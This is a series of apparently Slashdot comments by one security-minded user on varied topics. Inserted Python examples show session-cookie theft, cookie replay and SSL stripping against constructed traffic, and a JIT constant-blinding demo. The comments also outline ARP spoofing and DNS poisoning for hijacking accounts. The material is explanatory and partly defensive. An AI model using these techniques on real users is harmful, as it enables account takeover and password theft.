Comment Re:Ask the credit card for a refund (Score 1) 307

Yep. One of the few times I issued a chargeback (HP laptop repair by manufacturer due to a non-functional video card; the service request explicitly did not include the hard drive but they took it out, (supposedly) destroyed it, and replaced it with an OEM imaged one; fortunately it was a dual-drive laptop and all my data was on the second drive which I'd removed prior to sending it in) the vendor (HP) tried to contest it. After an annoying phone call with my CC company (Visa through Wells Fargo, which I do not recommend) I faxed them the repair order (clearly stating not to touch the HDD), repair receipt (which clearly stated what they'd done to the HDD), and a printout of the IM transcript where their service agent had assured me they wouldn't touch the hard drive. Not *quite* the only time I've had to send a fax in the last ten years, but close.

Anyhow, got the charge for the service reversed, but I did have to prove they had failed to uphold their service agreement to the terms that I'd paid for.

Incidentally, this was after going through numerous complaints with the service center itself (where they used the laughable argument of an analogy to car repair). I had recently had a significant amount of car repair, which by law includes a very detailed statement of what things are and are not to be replaced, itemized costs, and a stipulation that all replaced parts must be available for return to the owner (i.e. no destroying them without the owner explicitly asking you to). I also filed a report with the BBB. This is all from back in 2008 though, and the laptop actually still works so I have no other significant complaint about HP.

Comment Re:cost/price per kW hour comparison is nonsense (Score 3, Informative) 516

Speaking as somebody who has spent years living on a sailboat where electricity was entirely provided by solar:

Even within a few miles of the equator, at local noon, a good rain squall will drop PV production to under 20% of its normal amount at that time. Later (or earlier) in the day it can easily drop all the way to effective zero - the charge controller eats a bit - until the sky clears. Of course, on the tropical ocean, "until the sky clears" is usually not that long. We (well, "they" now; my parents still live aboard but I do not) can run for a couple days (if fully charged) just living off the battery bank, though that would drop its charge lower than we like to let it go. On a really rainy day we might only get about 1/4 the normal production; if that keeps up for three days or so we'll run the engine for an hour to juice the batteries up.

As for winter, the biggest problem is not the angle of the sun (that is *a* problem, even if you tilt the panels, because of atmospheric losses... but it's not a huge problem) but instead is the length of the day. You might get 80% of summer noon on a sunny winter noon in some places (I doubt it would be true up here in the Pacific Northwet, and no, that's not a typo), but the boat has never been anywhere that *has* a "winter" so I can't speak from experience. However, on an average tropical Caribbean day, I measured meaningful power from 7:30 AM to 5:30 PM (10 hours total), with peak output around 1PM. That's only ten hours of electricity generation, and the vast majority of it occurred between 9:30 AM and 4 PM, for a period of only 6.5 hours (call it 2/3 of the day) where the panels produced more than 50% of their typical mid-day maximum. In Seattle in the middle of winter, we don't even get close to 10 hours of daylight; I wouldn't be surprised if we didn't get more than 6.5 hours of usable light at all. So, 2/3 as much time, multiply by 4/5 for lost brightness even at midday, and you're looking at barely over half the power per day in winter that you get from peak summer brightness. Take into account the fact that tropical days are shorter than summer days, and it looks even worse for a comparison of winter vs. summer.

Comment Re:Could be solved be VISA, etc. immediately (Score 2) 307

Checks (cheques, this being a British hotel) do still exist, but yeah, that would still be pretty much a death knell. The only time I don't pay for a hotel online (with my credit card) is if I'm in a place so remote I either don't get cell signal or they aren't listed on the online booking sites. Even in most of those places, though, I pay with my card. The only time in the last decade I've paid cash for lodging was a few "tea houses" in the Himalayas, most of which didn't even have electricity (maybe one solar panel, battery, and a light over the kitchen/dining area).

Comment Re:Why do this (free, easy SSL certificates)? (Score 1) 212

A) WTF do you mean, "nearly worthless"? It'll mean what it does today: the connection is secured using SSL/TLS. Nothing more and nothing less. HTTPS isn't some special indication that a site is Serious Business or something. It just means that an eavesdropper can't listen in on the connection or intercept the traffic. If you *REALLY* think there's value in that distinction, though, Extended Validation certs (green URL bar) will still exist to take money from people like you.
B) Vaguely possible, but not something I'm really worried about. If their server is so insecure that the data they send is easily exposed, then they probably wouldn't have cared about what data they were or were not sending in the first place. Besides, that's *still* better than having *all* the data (including authentication data) be sent in plain text!
C) Bullshit. There are many ways around that. The easy (obvious, to anybody who knows anything about the subject) one is to fake up your own CA, install its certificate, and use a proxy server that serves up faked certs signed by your faked up CA. Burp Suite and Fiddler (two common web proxy tools, the first of which is explicitly intended for web security testing) already support doing this and have supported it for years.

i) How do you think it'll do that? The technique these people are using to authenticate domain ownership is better than what some existing "trusted" CAs use...
ii) Cry me a fucking river. The world will not miss them.
iii) See previous points, including the ones that express "WTF are you talking about?".

Authority: I've been in the information security and penetration testing profession, including lots of tests of web apps, web services, and mobile apps, since 2006.

Comment Re:So how much power will this use? (Score 1) 212

Actually, there's a pretty damn good reason why Slashdot *should* be private:

You (and I) are logged into this site. That means a unique identifier tied to our Slashdot accounts is sent to the server (in a cookie) with every request we make. This lets Slashdot know who we are, primarily for when we post a comment. The problem is, this unique identifier is sent in plain text; anybody on the same network as you or anywhere in the network between you and Slashdot's servers can see it.

Now, I don't know about you, but it's not *that* hard to get from my Slashdot identity to my real name. I assume everything I post here can be traced back to me. I'm OK with that; if I wanted to post something privately (and for some reason didn't want to post AC) I'd create and use a throwaway account, possibly via TOR + an additional proxy redirect at an Internet café or something (Slashdot blocks known TOR exit nodes, if I recall correctly). However, just because I'm OK with the posts I make being traceable to me does *not* mean I'm OK with just anybody who wants to posting in my name.

Right now, if you and I were on the same local network (wireless or wired), I could use techniques such as ARP spoofing or DNS poisoning to intercept every HTTP request you send to Slashdot, and every response it sends you. I could extract your authentication cookie and use it to make requests that Slashdot would think come from you and would post under your username. I could even have an excellent chance to steal your password; all I would have to do is modify Slashdot's responses to make it look like you aren't signed in. Then, when you go to the login page (which normally sends your password via HTTPS, but is itself served over HTTP), I use a technique called SSL Stripping to modify the login form so that it submits your password over plain-text HTTP (I could then submit that password to Slashdot over HTTPS, as it expects). Now I have your username and password, I can modify your account, I can post as you, and odds are you don't even know you were compromised.

None of that even requires any special skill, not even basic coding. The tools to do it all are pre-built and available for free download.
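As an added illustration (not part of the comment above, and not Slashdot's own code): the three attacker steps described there, cookie theft from a plaintext request, cookie replay, and rewriting the login form so it submits over HTTP, run against a constructed request/response pair. The host `example-forum.invalid`, the cookie names and the `/login` path are placeholders. The last function is the check a defender would run on the server's responses: any `Set-Cookie` without the `Secure` attribute can be lifted and replayed exactly this way.

```python
"""Added example (not from the original comment): what an on-path attacker sees in
plaintext HTTP, how a cookie is replayed, and how a login form gets "stripped".
All traffic below is constructed for this example; the host, cookie names and
paths are placeholders, not a real site's."""
import re
from http.cookies import SimpleCookie

# Constructed sample: a plaintext HTTP request captured on the local network.
CAPTURED_REQUEST = (
    "GET /comments.pl?sid=123 HTTP/1.1\r\n"
    "Host: example-forum.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: session=8f2c1a9d7e; prefs=dark\r\n"
    "\r\n"
)

# Constructed sample: plaintext response carrying a login form whose action points
# at HTTPS (the "form served over HTTP, submitted over HTTPS" pattern).
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=8f2c1a9d7e; Path=/\r\n"
    "\r\n"
    '<form action="https://example-forum.invalid/login" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
)

# Constructed sample: the same response with a cookie the browser will only send
# over HTTPS, so a plaintext sniffer never sees it.
HARDENED_RESPONSE = CAPTURED_RESPONSE.replace(
    "Set-Cookie: session=8f2c1a9d7e; Path=/",
    "Set-Cookie: session=8f2c1a9d7e; Path=/; Secure; HttpOnly",
)


def parse_http(raw):
    """Split a raw HTTP message into (start line, {lower-name: [values]}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def steal_cookies(raw_request):
    """Attacker side: the Cookie header is in the clear, so the session value is too."""
    _, headers, _ = parse_http(raw_request)
    jar = SimpleCookie()
    for value in headers.get("cookie", []):
        jar.load(value)
    return {name: morsel.value for name, morsel in jar.items()}


def forge_request(path, host, cookies):
    """Attacker side: replay the stolen cookie; the server believes this is the victim."""
    cookie_hdr = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_hdr}\r\nContent-Length: 0\r\n\r\n")


def strip_ssl(raw_response):
    """Attacker side: rewrite https:// form targets in a plaintext page so the
    browser posts the credentials over HTTP, where the proxy reads them."""
    _, _, body = parse_http(raw_response)
    return re.sub(r'action="https://', 'action="http://', body)


def insecure_cookies(raw_response):
    """Defender side: names of cookies set without the Secure attribute. Those are
    the ones a browser will also send over plain HTTP, i.e. the ones sniffable above."""
    _, headers, _ = parse_http(raw_response)
    leaky = []
    for set_cookie in headers.get("set-cookie", []):
        jar = SimpleCookie()
        jar.load(set_cookie)
        for name, morsel in jar.items():
            if not morsel["secure"]:
                leaky.append(name)
    return leaky


if __name__ == "__main__":
    stolen = steal_cookies(CAPTURED_REQUEST)
    print("stolen:", stolen)
    print(forge_request("/comments.pl", "example-forum.invalid", stolen))
    print("stripped form:", strip_ssl(CAPTURED_RESPONSE))
    print("cookies without Secure:", insecure_cookies(CAPTURED_RESPONSE))
    print("after hardening:", insecure_cookies(HARDENED_RESPONSE))
```

The ARP-spoofing or DNS-poisoning step that puts the attacker on the path is not shown; the code starts from the bytes such a position yields. On the defending side, the `Secure` attribute stops the browser from attaching the cookie to any plaintext request, and serving the whole site over HTTPS with HSTS removes the plaintext page the form rewrite depends on.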

Comment Re:If at first you don't succeed... (Score 1) 262

Well, or you could STOP BUYING DRM SHIT instead, too. If Steam can take away your game library (and they can, and sometimes will) then they're DRM and they're shit, plain and simple. I do not get all this fawning over Steam that I see from so many people in what's normally a very anti-DRM community.

Comment Re:If at first you don't succeed... (Score 1) 262

This is why I don't drop a lot of money on a game unless I've been able to trial it. Not pirate it, just trial it. There are, in fact, game devs that release trials of their games.

Most single-player RPGs and adventure games do not, which is kind of odd because it should be pretty easy to figure out a point (in either time or game progression) where if the player is enjoying the game they'll be hooked but which still leaves lots of content. Conversely, damn near all MMOs do offer such a trial, typically with a level cap and/or time cap. While I'm well aware of the differences between MMOs and single-player games, I don't understand why the big devs are so aware of the "get them hooked and they'll pay up" system for MMOs but don't take the obvious adaptation for single-player games.

Well, unless they know their games are shit and don't want people to know that before they buy. But that still doesn't justify pirating the game, just watch other people play (friends or reviewers), or borrow from a friend if possible.

Comment Re:Apple (Score 1) 52

No, PC browsers (with the possible exception of Safari?) don't do anything nearly so braindead, nor do any of the other kinds of PC software that use a JIT (a few examples: Java, .NET, Flash). You allocate the memory, with pages mapped R/W. You emit JIT-compiled code into a page. You re-map the page to R/X! Repeat as more pages are needed. You never, ever have an R/W/X page.

In fact, browsers (IE and Chrome at a minimum, probably others) and Flashplayer take things a step further. Since you can generate a huge number of almost-entirely-attacker-controlled instructions by doing operations that will compile down as arithmetic on immediate values (constants), and since x86 (and, to a lesser extent, many ARM systems courtesy of THUMB-2 mode) allows code to be interpreted as a completely different instruction sequence if you enter the binary stream in the middle of an instruction, one technique for getting executable-mapped shellcode into a browser is to have a script that does a ton of arithmetic on carefully chosen constants. Therefore, the above-mentioned JITs (IE, Chrome, Flashplayer, maybe others) use a technique called "constant blinding" where every constant operation is actually emitted as two instructions: a masked constant getting XORed with its mask value to produce the expected constant (in a register), and then an operation on that value. No long sequence of known instructions with attacker-controlled immediates means no way to predict the result of entering an instruction stream at an offset.

If Safari on iOS really is so stupid as to have R/W/X pages just because of its JIT, Apple has fucked up colossally.
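An added example, not code from any of the browsers or runtimes the comment above mentions: the constant-blinding idea from its second paragraph, worked through on the x86-64 encodings of `mov eax, imm32` (opcode B8) and `xor eax, imm32` (opcode 35). The "attacker" byte sequence and the fixed mask are constructed placeholders; the two opcode bytes are the real ones. The W^X remapping from the first paragraph is not shown, only the instruction-emission side.

```python
"""Added example (not from the original comment or any real JIT): emit a run of
x86-64 'mov eax, imm32' the naive way and the constant-blinded way, then check
whether the attacker-chosen immediates survive verbatim in the code bytes.
The payload bytes are a constructed placeholder, not shellcode."""
import os
import struct

MOV_EAX_IMM32 = b"\xb8"   # mov eax, imm32: 1 opcode byte + 4-byte little-endian immediate
XOR_EAX_IMM32 = b"\x35"   # xor eax, imm32: same layout


def emit_naive(constants):
    """Naive JIT: every script constant lands verbatim in executable memory,
    5 bytes apart, so the attacker controls 4 of every 5 bytes."""
    return b"".join(MOV_EAX_IMM32 + struct.pack("<I", c) for c in constants)


def emit_blinded(constants, rng=os.urandom):
    """Blinded JIT: mov eax, (c ^ mask); xor eax, mask. eax still ends up
    holding c, but neither immediate in the code stream is attacker-chosen.
    rng is injectable so the result can be checked deterministically."""
    code = bytearray()
    for c in constants:
        mask = struct.unpack("<I", rng(4))[0]
        code += MOV_EAX_IMM32 + struct.pack("<I", c ^ mask)
        code += XOR_EAX_IMM32 + struct.pack("<I", mask)
    return bytes(code)


def simulate(code):
    """Tiny interpreter for just the two instruction forms above. Returns the
    final eax, to confirm that blinding does not change what the program computes."""
    eax, pc = 0, 0
    while pc < len(code):
        op = code[pc:pc + 1]
        imm = struct.unpack("<I", code[pc + 1:pc + 5])[0]
        if op == MOV_EAX_IMM32:
            eax = imm
        elif op == XOR_EAX_IMM32:
            eax ^= imm
        else:
            raise ValueError(f"unknown opcode {op.hex()} at {pc}")
        pc += 5
    return eax


def attacker_sequence_present(code, payload):
    """Does the contiguous byte sequence the attacker chose appear in the emitted
    code at all? If it does, a jump into the middle of an instruction reaches it."""
    return payload in code


def demo(payload=b"\x90\x90\x90\xcc", repeat=3):
    """Run both emitters on the same attacker-chosen constant and report whether
    the payload bytes are reachable. Uses real random masks."""
    constant = struct.unpack("<I", payload)[0]      # little-endian, as the CPU reads it
    constants = [constant] * repeat
    naive, blinded = emit_naive(constants), emit_blinded(constants)
    return {
        "naive_hits": naive.count(payload),
        "blinded_hits": blinded.count(payload),
        "same_result": simulate(naive) == simulate(blinded) == constant,
    }


if __name__ == "__main__":
    print(demo())
```

A real JIT's blinding uses a fresh mask per constant from a source the script cannot observe; the injectable `rng` here exists only so the check below can use a fixed mask. With a genuinely random 32-bit mask, the masked immediate equals the attacker's constant only when the mask is zero, i.e. one time in 2^32.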

Comment Re:Bug (Score 1) 474

On the one hand, that shows off an impressive level of detail, with the eyeballs (not just the very fronts of the eyes) as their own models, for example.
On the other hand, WTF? I mean, I've seen games with graphics glitches like that before, usually when there's a video driver issue, so maybe it's just that... but I would expect they could afford to test on the current swath of video cards and at least the most *common* driver selections...

Comment Visual Studio "Community" edition (Score 1) 525

Microsoft also just (today) announced a new edition of VS 2013, called "Community", that is free (like the old Express editions) but is "full-featured" and supports both extensions and multiple languages. In fact, it comes with support for building iOS and Android apps built in, which kind of astonished me.

As far as I can tell, the only difference between Community and Professional, aside from the presence of a purchase price, is that Comm is "for non-enterprise application development". I'm not sure where something crosses the line into being an "enterprise", but I think it's quite fair to say you can write and publish mobile apps (including iOS or Android mobile apps) with this as a hobby or independent developer.

http://www.visualstudio.com/en...

Comment Re:Please, Please, Please (Score 1) 265

Run Linux the same way (far too) many people run Windows, and you'll find it's not that much better, security-wise. Sure, Linux doesn't make downloaded files executable by default... which is why we have http://curlpipesh.tumblr.com/ (or rather, the examples it provides). Linux doesn't run everything as root (unless you run as root, which 10 years ago was "WTF?!? Nobody would do that" and today is becoming more and more common just as it is on Windows) but then, neither does Windows... unless you do something about as intelligent as logging into your Linux system as root (and people do it all the time nonetheless). Besides, not being root isn't a guarantee of any safety; you can do a lot of damage as a normal user. Package managers should, in theory, keep people from falling for "your Flash player is out of date, you need to install this update to view the video" malware, but people who are using Linux the same way they use Windows will install third-party software from outside the repos often enough; most of the commercial Linux games I've seen, for example, require doing this.

Linux is definitely less *targeted* by run-of-the-mill malware, especially the stuff that looks to exploit the day-to-day user, but that doesn't make it more secure. Most of the Flashplayer and Adobe Reader and Java exploits out there can be exploited on Linux just as well as on Windows, but nobody bothers to do so because there isn't any return on the investment (malware is about making money, in nearly every case relevant to a home user). The recent slew of decades-old security vulns in such core packages as bash and X11 (to say nothing of OpenSSL) show that the whole "many eyes" theory doesn't actually mean that open source software is inherently well security-reviewed.

Comment Re:Yes, but the real problem is being ignored. (Score 1) 461

So, what prevents this hypothetical 17-year-old from presenting a forged stripping license? I mean, they could check with the licensing agency to see if a given license is valid... but hey, you can do that with a driver's license (or non-driver ID, or passport, or military ID, or whatever other form of government-issued photo ID you care to mention). Why do you need a *different* state-issued piece of paper to provide the same information?

Your scenario describes a situation where the club owners have reason to be concerned about the "legitimacy" of their dancers. Fine, let them submit the paperwork and review the information verifying the valid state-issued ID themselves. YOU DON'T NEED A NEW FORM OF STATE-ISSUED LICENSE FOR THIS! Seriously, it's not that hard to understand. These licenses provide *no* benefit. A concerned business owner could (easily) verify age without it, and an unconcerned one wouldn't give a fuck about the stripping license anyhow.

Come back when you have a non-bullshit excuse.

Comment That doesn't make sense (Score 1) 461

Leaving aside the issue of whether (voluntary) prostitution ought to be the government's concern at all, I still don't see why this requires public records. Want to know the person's age? Ask to see their government-issued photo ID. Driver's licenses, non-driver ID, passports, and so forth all already exist for (among others) that exact purpose. Yes, they can be forged, but what about a driver's license is more forgeable than a nude dancing license? As for criminal background checks, those are a standard part of many hiring processes.

There's no need to license and track this particular form of occupation specifically. None at all.
